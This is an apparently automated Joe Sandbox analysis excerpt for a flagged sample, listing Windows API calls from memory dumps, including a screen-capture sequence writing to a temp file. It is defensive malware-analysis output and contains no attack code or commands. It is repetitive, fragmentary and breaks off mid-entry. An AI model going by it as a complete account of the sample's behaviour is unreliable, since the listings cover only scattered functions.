                                                            • EnumSystemLocalesW.KERNEL32(0043B665,00000001,?,?,004307D5,?,0043BA06,004307D5,?,?,?,?,?,004307D5,?,?), ref: 0043B3D4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$EnumLocalesSystem_free
                                                            APIs
                                                              • Part of subcall function 00A82161: GetLastError.KERNEL32(?,?,00A7AA0C,?,00000000,?,00A7CE06,00A5249A,00000000,?,00451F20), ref: 00A82165
                                                              • Part of subcall function 00A82161: _free.LIBCMT ref: 00A82198
                                                              • Part of subcall function 00A82161: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 00A821D9
                                                            • EnumSystemLocalesW.KERNEL32(0043B665,00000001,00000006,?,00A80A3C,?,00A8BC6D,00A80A3C,?,?,?,?,?,00A80A3C,?,?), ref: 00A8B63B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorLast$EnumLocalesSystem_free
                                                            APIs
                                                              • Part of subcall function 0042E40D: EnterCriticalSection.KERNEL32(?,?,00431C9A,?,00457A38,00000008,00431D68,?,?,?), ref: 0042E41C
                                                            • EnumSystemLocalesW.KERNEL32(00434DA7,00000001,00457BB8,0000000C), ref: 00434E25
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: CriticalEnterEnumLocalesSectionSystem
                                                            APIs
                                                              • Part of subcall function 00A7E674: RtlEnterCriticalSection.NTDLL(00600DD4), ref: 00A7E683
                                                            • EnumSystemLocalesW.KERNEL32(00434DA7,00000001,00457BB8,0000000C), ref: 00A8508C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CriticalEnterEnumLocalesSectionSystem
                                                            APIs
                                                              • Part of subcall function 00431EFA: GetLastError.KERNEL32(?,?,0042E005,00457910,00000010), ref: 00431EFE
                                                              • Part of subcall function 00431EFA: _free.LIBCMT ref: 00431F31
                                                              • Part of subcall function 00431EFA: SetLastError.KERNEL32(00000000), ref: 00431F72
                                                            • EnumSystemLocalesW.KERNEL32(0043B1F9,00000001,?,?,?,0043BA64,004307D5,?,?,?,?,?,004307D5,?,?,?), ref: 0043B2D9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$EnumLocalesSystem_free
                                                            APIs
                                                              • Part of subcall function 00A82161: GetLastError.KERNEL32(?,?,00A7AA0C,?,00000000,?,00A7CE06,00A5249A,00000000,?,00451F20), ref: 00A82165
                                                              • Part of subcall function 00A82161: _free.LIBCMT ref: 00A82198
                                                              • Part of subcall function 00A82161: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 00A821D9
                                                            • EnumSystemLocalesW.KERNEL32(0043B1F9,00000001,00000006,?,?,00A8BCCB,00A80A3C,?,?,?,?,?,00A80A3C,?,?,?), ref: 00A8B540
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorLast$EnumLocalesSystem_free
                                                            APIs
                                                            • SetUnhandledExceptionFilter.KERNEL32(Function_00010692,0040FC1E), ref: 0041068B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled
                                                            • String ID:
                                                            • API String ID: 3192549508-0
                                                            APIs
                                                            • SetUnhandledExceptionFilter.KERNEL32(00410692,00A5FE85), ref: 00A608F2
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled
                                                            • String ID:
                                                            • API String ID: 3192549508-0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: HeapProcess
                                                            • String ID:
                                                            • API String ID: 54951025-0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555377117.0000000000869000.00000040.00000020.00020000.00000000.sdmp, Offset: 00869000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_869000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            APIs
                                                            • DefWindowProcW.USER32(?,00000014,?,?), ref: 00402151
                                                            • GetClientRect.USER32(?,?), ref: 00402166
                                                            • GetDC.USER32(?), ref: 0040216D
                                                            • CreateSolidBrush.GDI32(00646464), ref: 00402180
                                                            • SelectObject.GDI32(00000000,00000000), ref: 00402194
                                                            • CreatePen.GDI32(00000001,00000001,00FFFFFF), ref: 0040219F
                                                            • SelectObject.GDI32(00000000,00000000), ref: 004021AD
                                                            • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 004021C0
                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004021CB
                                                            • MulDiv.KERNEL32(00000008,00000000), ref: 004021D4
                                                            • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000031,Tahoma), ref: 004021F8
                                                            • SelectObject.GDI32(00000000,00000000), ref: 00402206
                                                            • SetBkMode.GDI32(?,00000001), ref: 00402283
                                                            • SetTextColor.GDI32(?,00000000), ref: 00402292
                                                            • _wcslen.LIBCMT ref: 0040229B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: CreateObjectSelect$BrushCapsClientColorDeviceFontModeProcRectRectangleSolidTextWindow_wcslen
                                                            • String ID: Tahoma
                                                            • API String ID: 3832963559-3580928618
                                                            APIs
                                                            • DestroyWindow.USER32(?), ref: 004025ED
                                                            • DefWindowProcW.USER32(?,00000204,?,?), ref: 004025FF
                                                            • ReleaseCapture.USER32 ref: 00402612
                                                            • GetDC.USER32(00000000), ref: 00402639
                                                            • CreateCompatibleBitmap.GDI32(?,-0045D5E7,00000001), ref: 004026C0
                                                            • CreateCompatibleDC.GDI32(?), ref: 004026C9
                                                            • SelectObject.GDI32(00000000,00000000), ref: 004026D3
                                                            • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00CC0020), ref: 00402701
                                                            • ShowWindow.USER32(?,00000000), ref: 0040270A
                                                            • GetTempPathW.KERNEL32(00000104,?), ref: 0040271C
                                                            • GetTempFileNameW.KERNEL32(?,gya,00000000,?), ref: 00402737
                                                            • DeleteFileW.KERNEL32(?), ref: 00402751
                                                            • DeleteDC.GDI32(00000000), ref: 00402758
                                                            • DeleteObject.GDI32(00000000), ref: 0040275F
                                                            • ReleaseDC.USER32(00000000,?), ref: 0040276D
                                                            • DestroyWindow.USER32(?), ref: 00402774
                                                            • SetCapture.USER32(?), ref: 004027C1
                                                            • GetDC.USER32(00000000), ref: 004027F5
                                                            • ReleaseDC.USER32(00000000,00000000), ref: 0040280B
                                                            • GetKeyState.USER32(0000001B), ref: 00402818
                                                            • DestroyWindow.USER32(?), ref: 0040282D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: Window$DeleteDestroyRelease$CaptureCompatibleCreateFileObjectTemp$BitmapNamePathProcSelectShowState
                                                            • String ID: gya
                                                            • API String ID: 2545303185-1989253062
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: _free$Info
                                                            • String ID:
                                                            • API String ID: 2509303402-0
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _free$Info
                                                            • String ID:
                                                            • API String ID: 2509303402-0
                                                            APIs
                                                            • GetCurrentThreadId.KERNEL32 ref: 00A70C56
                                                            • Concurrency::details::UMS::CreateUmsCompletionList.LIBCONCRT ref: 00A70CBD
                                                            • Concurrency::details::InternalContextBase::ExecutedAssociatedChore.LIBCONCRT ref: 00A70CDA
                                                            • Concurrency::details::InternalContextBase::WorkWasFound.LIBCONCRT ref: 00A70D40
                                                            • Concurrency::details::InternalContextBase::ExecuteChoreInline.LIBCMT ref: 00A70D55
                                                            • Concurrency::details::InternalContextBase::WaitForWork.LIBCONCRT ref: 00A70D67
                                                            • Concurrency::details::InternalContextBase::SwitchTo.LIBCONCRT ref: 00A70D95
                                                            • Concurrency::details::UMS::GetCurrentUmsThread.LIBCONCRT ref: 00A70DA0
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00A70DCC
                                                            • Concurrency::details::WorkItem::TransferReferences.LIBCONCRT ref: 00A70DDC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Concurrency::details::$Base::ContextInternal$Work$ChoreCurrentThread$AssociatedCompletionCreateException@8ExecuteExecutedFoundInlineItem::ListReferencesSwitchThrowTransferWait
                                                            • String ID: 11@$%D
                                                            • API String ID: 3720063390-4114847594
                                                            APIs
                                                            • ___free_lconv_mon.LIBCMT ref: 0043A65C
                                                              • Part of subcall function 004399AB: _free.LIBCMT ref: 004399C8
                                                              • Part of subcall function 004399AB: _free.LIBCMT ref: 004399DA
                                                              • Part of subcall function 004399AB: _free.LIBCMT ref: 004399EC
                                                              • Part of subcall function 004399AB: _free.LIBCMT ref: 004399FE
                                                              • Part of subcall function 004399AB: _free.LIBCMT ref: 00439A10
                                                              • Part of subcall function 004399AB: _free.LIBCMT ref: 00439A22
                                                              • Part of subcall function 004399AB: _free.LIBCMT ref: 00439A34
                                                              • Part of subcall function 004399AB: _free.LIBCMT ref: 00439A46
                                                              • Part of subcall function 004399AB: _free.LIBCMT ref: 00439A58
                                                              • Part of subcall function 004399AB: _free.LIBCMT ref: 00439A6A
                                                              • Part of subcall function 004399AB: _free.LIBCMT ref: 00439A7C
                                                              • Part of subcall function 004399AB: _free.LIBCMT ref: 00439A8E
                                                              • Part of subcall function 004399AB: _free.LIBCMT ref: 00439AA0
                                                            • _free.LIBCMT ref: 0043A651
                                                              • Part of subcall function 0043348A: HeapFree.KERNEL32(00000000,00000000,?,0043A118,?,00000000,?,00000000,?,0043A3BC,?,00000007,?,?,0043A7B0,?), ref: 004334A0
                                                              • Part of subcall function 0043348A: GetLastError.KERNEL32(?,?,0043A118,?,00000000,?,00000000,?,0043A3BC,?,00000007,?,?,0043A7B0,?,?), ref: 004334B2
                                                            • _free.LIBCMT ref: 0043A673
                                                            • _free.LIBCMT ref: 0043A688
                                                            • _free.LIBCMT ref: 0043A693
                                                            • _free.LIBCMT ref: 0043A6B5
                                                            • _free.LIBCMT ref: 0043A6C8
                                                            • _free.LIBCMT ref: 0043A6D6
                                                            • _free.LIBCMT ref: 0043A6E1
                                                            • _free.LIBCMT ref: 0043A719
                                                            • _free.LIBCMT ref: 0043A720
                                                            • _free.LIBCMT ref: 0043A73D
                                                            • _free.LIBCMT ref: 0043A755
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                            • String ID:
                                                            • API String ID: 161543041-0
                                                            APIs
                                                            • ___free_lconv_mon.LIBCMT ref: 00A8A8C3
                                                              • Part of subcall function 00A89C12: _free.LIBCMT ref: 00A89C2F
                                                              • Part of subcall function 00A89C12: _free.LIBCMT ref: 00A89C41
                                                              • Part of subcall function 00A89C12: _free.LIBCMT ref: 00A89C53
                                                              • Part of subcall function 00A89C12: _free.LIBCMT ref: 00A89C65
                                                              • Part of subcall function 00A89C12: _free.LIBCMT ref: 00A89C77
                                                              • Part of subcall function 00A89C12: _free.LIBCMT ref: 00A89C89
                                                              • Part of subcall function 00A89C12: _free.LIBCMT ref: 00A89C9B
                                                              • Part of subcall function 00A89C12: _free.LIBCMT ref: 00A89CAD
                                                              • Part of subcall function 00A89C12: _free.LIBCMT ref: 00A89CBF
                                                              • Part of subcall function 00A89C12: _free.LIBCMT ref: 00A89CD1
                                                              • Part of subcall function 00A89C12: _free.LIBCMT ref: 00A89CE3
                                                              • Part of subcall function 00A89C12: _free.LIBCMT ref: 00A89CF5
                                                              • Part of subcall function 00A89C12: _free.LIBCMT ref: 00A89D07
                                                            • _free.LIBCMT ref: 00A8A8B8
                                                              • Part of subcall function 00A836F1: HeapFree.KERNEL32(00000000,00000000,?,00A8A37F,?,00000000,?,00000000,?,00A8A623,?,00000007,?,?,00A8AA17,?), ref: 00A83707
                                                              • Part of subcall function 00A836F1: GetLastError.KERNEL32(?,?,00A8A37F,?,00000000,?,00000000,?,00A8A623,?,00000007,?,?,00A8AA17,?,?), ref: 00A83719
                                                            • _free.LIBCMT ref: 00A8A8DA
                                                            • _free.LIBCMT ref: 00A8A8EF
                                                            • _free.LIBCMT ref: 00A8A8FA
                                                            • _free.LIBCMT ref: 00A8A91C
                                                            • _free.LIBCMT ref: 00A8A92F
                                                            • _free.LIBCMT ref: 00A8A93D
                                                            • _free.LIBCMT ref: 00A8A948
                                                            • _free.LIBCMT ref: 00A8A980
                                                            • _free.LIBCMT ref: 00A8A987
                                                            • _free.LIBCMT ref: 00A8A9A4
                                                            • _free.LIBCMT ref: 00A8A9BC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                            • String ID:
                                                            • API String ID: 161543041-0
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: _free
                                                            • String ID:
                                                            • API String ID: 269201875-0
                                                            APIs
                                                            • Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 00424886
                                                              • Part of subcall function 00424B55: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,004245B9), ref: 00424B65
                                                            • Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 0042489B
                                                            • std::invalid_argument::invalid_argument.LIBCONCRT ref: 004248AA
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 004248B8
                                                            • Concurrency::details::FreeVirtualProcessorRoot::Affinitize.LIBCONCRT ref: 0042492E
                                                            • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042496E
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0042497C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: Concurrency::details::$Exception@8FreeProcessorRoot::ThrowVirtualstd::invalid_argument::invalid_argument$AffinitizeExecutionIdleObjectProxy::ResetSingleSuspendThreadWait
                                                            • String ID: 11@$pContext$switchState
                                                            • API String ID: 3151764488-3851367110
                                                            APIs
                                                            • LoadLibraryExW.KERNEL32(advapi32.dll,00000000,00000800,0045A064,00000000,?,?,00000000,00441C33,000000FF,?,00A6F248,00000004,00A67DA7,00000004,00A68089), ref: 00A6EF19
                                                            • GetLastError.KERNEL32(?,00A6F248,00000004,00A67DA7,00000004,00A68089,?,00A687B9,?,00000008,00A6802D,00000000,?,?,00000000,?), ref: 00A6EF25
                                                            • LoadLibraryW.KERNEL32(advapi32.dll,?,00A6F248,00000004,00A67DA7,00000004,00A68089,?,00A687B9,?,00000008,00A6802D,00000000,?,?,00000000), ref: 00A6EF35
                                                            • GetProcAddress.KERNEL32(00000000,00447430), ref: 00A6EF4B
                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00A6EF61
                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00A6EF78
                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00A6EF8F
                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00A6EFA6
                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00A6EFBD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AddressProc$LibraryLoad$ErrorLast
                                                            • String ID: advapi32.dll
                                                            • API String ID: 2340687224-4050573280
                                                            APIs
                                                            • LoadLibraryExW.KERNEL32(advapi32.dll,00000000,00000800,0045A064,00000000,?,?,00000000,00441C33,000000FF,?,00A6F248,00000004,00A67DA7,00000004,00A68089), ref: 00A6EF19
                                                            • GetLastError.KERNEL32(?,00A6F248,00000004,00A67DA7,00000004,00A68089,?,00A687B9,?,00000008,00A6802D,00000000,?,?,00000000,?), ref: 00A6EF25
                                                            • LoadLibraryW.KERNEL32(advapi32.dll,?,00A6F248,00000004,00A67DA7,00000004,00A68089,?,00A687B9,?,00000008,00A6802D,00000000,?,?,00000000), ref: 00A6EF35
                                                            • GetProcAddress.KERNEL32(00000000,00447430), ref: 00A6EF4B
                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00A6EF61
                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00A6EF78
                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00A6EF8F
                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00A6EFA6
                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00A6EFBD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AddressProc$LibraryLoad$ErrorLast
                                                            • String ID: advapi32.dll
                                                            • API String ID: 2340687224-4050573280
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?,?,?,00A6672B), ref: 00A624D6
                                                            • GetProcAddress.KERNEL32(00000000,00446CDC), ref: 00A624E4
                                                            • GetProcAddress.KERNEL32(00000000,00446CF4), ref: 00A624F2
                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,00446D0C,?,?,?,00A6672B), ref: 00A62520
                                                            • GetProcAddress.KERNEL32(00000000), ref: 00A62527
                                                            • GetLastError.KERNEL32(?,?,?,00A6672B), ref: 00A62542
                                                            • GetLastError.KERNEL32(?,?,?,00A6672B), ref: 00A6254E
                                                            • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00A62564
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00A62572
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AddressProc$ErrorHandleLastModule$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                            • String ID: kernel32.dll
                                                            • API String ID: 4179531150-1793498882
                                                            APIs
                                                            • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,004401AF), ref: 0043EEE5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: DecodePointer
                                                            • String ID: 11@$acos$asin$exp$log$log10$pow$sqrt
                                                            • API String ID: 3527080286-2461957735
                                                            • Opcode ID: c5a83a7c3a5692031bd98a2408cfaa5972c38f8111fe63a4894d5265efbafef3
                                                            • Instruction ID: 47f9428d28cfd6d6d0fcc487ca1ad96a5e838d4e1f3ed62f9574ed722bc2da70
                                                            • Opcode Fuzzy Hash: c5a83a7c3a5692031bd98a2408cfaa5972c38f8111fe63a4894d5265efbafef3
                                                            • Instruction Fuzzy Hash: 1A51A07490160ADBCF14DFA8E6481AEBBB0FF0D300F6551A7E480AB255C7798D29CB1E
                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 00419788
                                                            • GetCurrentProcess.KERNEL32(000000FF,00000000), ref: 00419792
                                                            • DuplicateHandle.KERNEL32(00000000), ref: 00419799
                                                            • SafeRWList.LIBCONCRT ref: 004197B8
                                                              • Part of subcall function 00417787: Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00417798
                                                              • Part of subcall function 00417787: List.LIBCMT ref: 004177A2
                                                            • std::invalid_argument::invalid_argument.LIBCONCRT ref: 004197CA
                                                            • GetLastError.KERNEL32 ref: 004197D9
                                                            • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004197EF
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 004197FD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
